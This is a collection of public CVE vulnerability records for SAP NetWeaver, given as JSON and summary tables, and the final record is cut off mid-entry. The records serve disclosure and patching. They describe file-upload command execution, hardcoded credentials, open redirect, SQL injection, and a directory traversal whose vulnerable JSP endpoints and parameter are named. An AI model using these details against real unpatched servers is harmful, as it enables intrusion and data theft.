SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/3084487 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (Visual Composer 7.0 RT) |
Version: 7.30 Version: 7.31 Version: 7.40 Version: 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T01:37:16.194Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3084487"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Visual Composer 7.0 RT)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "7.30"
},
{
"status": "affected",
"version": "7.31"
},
{
"status": "affected",
"version": "7.40"
},
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Unrestricted File Upload",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-10T17:53:49.199Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3084487"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2021-38163",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (Visual Composer 7.0 RT)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.30"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.40"
},
{
"version_name": "\u003c",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable."
}
]
},
"impact": {
"cvss": {
"baseScore": "9.9",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Unrestricted File Upload"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
},
{
"name": "https://launchpad.support.sap.com/#/notes/3084487",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3084487"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2021-38163",
"datePublished": "2021-09-14T11:21:36",
"dateReserved": "2021-08-07T00:00:00",
"dateUpdated": "2024-08-04T01:37:16.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-5067
Vulnerability from cvelistv5
Published
2015-06-24 14:00
Modified
2024-08-06 06:32
Severity ?
EPSS score ?
Summary
The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:32:32.510Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html"
},
{
"name": "75165",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/75165"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html"
},
{
"name": "75165",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/75165"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-5067",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"name": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"name": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015",
"refsource": "MISC",
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"name": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html"
},
{
"name": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html"
},
{
"name": "75165",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/75165"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-5067",
"datePublished": "2015-06-24T14:00:00",
"dateReserved": "2015-06-24T00:00:00",
"dateUpdated": "2024-08-06T06:32:32.510Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2476
Vulnerability from cvelistv5
Published
2018-11-13 20:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/2658755 | x_refsource_MISC | |
| http://www.securityfocus.com/bid/105898 | vdb-entry, x_refsource_BID | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | SAP NetWeaver (forums) |
Version: = 7.30 Version: = 7.31 Version: = 7.40 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:34.120Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"name": "105898",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105898"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (forums)",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.30"
},
{
"status": "affected",
"version": "= 7.31"
},
{
"status": "affected",
"version": "= 7.40"
}
]
}
],
"datePublic": "2018-11-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "URL Redirection",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-11-14T10:57:02",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"name": "105898",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105898"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2476",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (forums)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.30"
},
{
"version_name": "=",
"version_value": "7.31"
},
{
"version_name": "=",
"version_value": "7.40"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "URL Redirection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/2658755",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"name": "105898",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105898"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2476",
"datePublished": "2018-11-13T20:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:34.120Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-1289
Vulnerability from cvelistv5
Published
2012-02-23 18:00
Modified
2024-08-06 18:53
Severity ?
EPSS score ?
Summary
Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/52101 | vdb-entry, x_refsource_BID | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/73346 | vdb-entry, x_refsource_XF | |
| https://service.sap.com/sap/support/notes/1585527 | x_refsource_MISC | |
| http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a | x_refsource_CONFIRM | |
| http://dsecrg.com/pages/vul/show.php?id=412 | x_refsource_MISC | |
| http://dsecrg.com/pages/vul/show.php?id=413 | x_refsource_MISC | |
| http://secunia.com/advisories/47861 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:53:36.913Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "netweaver-logview-directory-traversal(73346)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47861"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-02-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "netweaver-logview-directory-traversal(73346)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47861"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1289",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "52101",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "netweaver-logview-directory-traversal(73346)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"name": "https://service.sap.com/sap/support/notes/1585527",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"name": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=412",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=413",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"name": "47861",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47861"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1289",
"datePublished": "2012-02-23T18:00:00",
"dateReserved": "2012-02-23T00:00:00",
"dateUpdated": "2024-08-06T18:53:36.913Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-3787
Vulnerability from cvelistv5
Published
2014-05-19 14:00
Modified
2024-09-16 16:13
Severity ?
EPSS score ?
Summary
SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://en.securitylab.ru/lab/PT-2014-09 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://service.sap.com/sap/support/notes/1997455 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/58671 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T10:57:17.242Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://en.securitylab.ru/lab/PT-2014-09"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1997455"
},
{
"name": "58671",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/58671"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-05-19T14:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://en.securitylab.ru/lab/PT-2014-09"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1997455"
},
{
"name": "58671",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/58671"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-3787",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://en.securitylab.ru/lab/PT-2014-09",
"refsource": "MISC",
"url": "http://en.securitylab.ru/lab/PT-2014-09"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://service.sap.com/sap/support/notes/1997455",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1997455"
},
{
"name": "58671",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/58671"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-3787",
"datePublished": "2014-05-19T14:00:00Z",
"dateReserved": "2014-05-19T00:00:00Z",
"dateUpdated": "2024-09-16T16:13:23.446Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7094
Vulnerability from cvelistv5
Published
2013-12-13 19:00
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/ | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1836718 | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/89603 | vdb-entry, x_refsource_XF | |
| http://secunia.com/advisories/56061 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/64232 | vdb-entry, x_refsource_BID | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:45.867Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1836718"
},
{
"name": "netweaver-rsddcvercounttabcols-sql-inject(89603)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"name": "56061",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56061"
},
{
"name": "64232",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/64232"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-11-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1836718"
},
{
"name": "netweaver-rsddcvercounttabcols-sql-inject(89603)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"name": "56061",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56061"
},
{
"name": "64232",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/64232"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
